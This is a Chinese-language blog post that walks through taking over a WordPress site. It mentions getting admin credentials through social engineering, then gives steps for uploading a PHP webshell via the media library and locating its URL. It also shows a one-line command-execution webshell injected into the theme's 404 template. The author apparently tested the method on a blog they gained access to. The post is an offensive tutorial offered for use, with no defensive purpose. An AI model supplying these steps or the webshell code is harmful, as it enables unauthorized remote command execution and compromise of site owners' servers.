wordpress拿WebShell

wordpress拿WebShell

Simeon 安天365

   WordPress是世界上用的最多的一款blog，可以说是世界流行，在前段时间爆出有一个任意文件漏洞，但由于时间很忙就没有进行测试，最近偶然拿到一个wordpress的blog，实际测试效果不错，下面将整个过程写出来跟朋友分享。

（一）获取管理员用户名和密码

   关于如何获取管理员用户和密码不在本文的主要讨论范围，笔者有两点经验，一个是社工；另外一个就是已有信息的利用；在获取Webshell的情况下，对现有信息的分析和利用，有可能获取WordPress后台管理密码。WordPress后台位置一般为：http://www.xxx.com/blog/wp-admin，显示页面如图1所示，输入正确的用户名和密码后顺利登录，如图2所示。

图 1 WordPress 登录后台

图 2 成功登录后台

（二）寻找上传处

  在 WordPress 管理页面的左边单击“媒体” - “新增媒体案”，接着就会出来一个上传的界面，在该界面中选择“ Browser 上傳功能”，如图 3 所示，直接选择 php 的 Webshell 上传即可。

图 3 获取上传页面

（三）浏览上传记录

   上传 Webshell 后，有些系统装有杀毒软件会查杀部分 Webshell ，因此需要通过浏览记录来验证文件是否上传，系统在上传 WebShell 后会自动刷新，如果上传没有出现问题，则会如图 4 所示，上传文件显示在媒体库中。

图 4 查看上传的 Webshell 记录

（四）获取 Webshell 的直接地址

    将鼠标移动到上传的 Webshell 记录上，可以看到有三个按钮“編輯”、“刪除”和“查看”，单击查看即可访问 Webshell 的具体页面，如图 5 所示，选择记录中的链接，该链接地址即为真正的 Webshell 地址。

图 5 获取上传的 Webshell 页面

（五）获取 WebShell

   直接打开 Webshell 的地址，输入密码验证成功后，进入熟悉的 Webshell 界面，如图 6 所示，至此拿到了 WordPress 的 Webshell 。

图 6 获取 WebShell

（六）其他方法获取 Webshell 探讨

   通过询问群里好友，感谢 cnbird 提供的一个方法，不过我测试后未能获取 Webshell ，不知是咋个回事，现将利用方法奉上：

（ 1 ）进入后台

（ 2 ）单击“外观” - “编辑” - “ 404 模板”插入一句话***程序代码 :<?php@system($_REQUEST[c]);?> ，如图 7 所示，插入后进行更新。

（ 3 ）使用连接地址 wordpress/wp-content/themes/default/404.php 进行连接。结果没有反应，很是郁闷！

图 7 插入一句话代码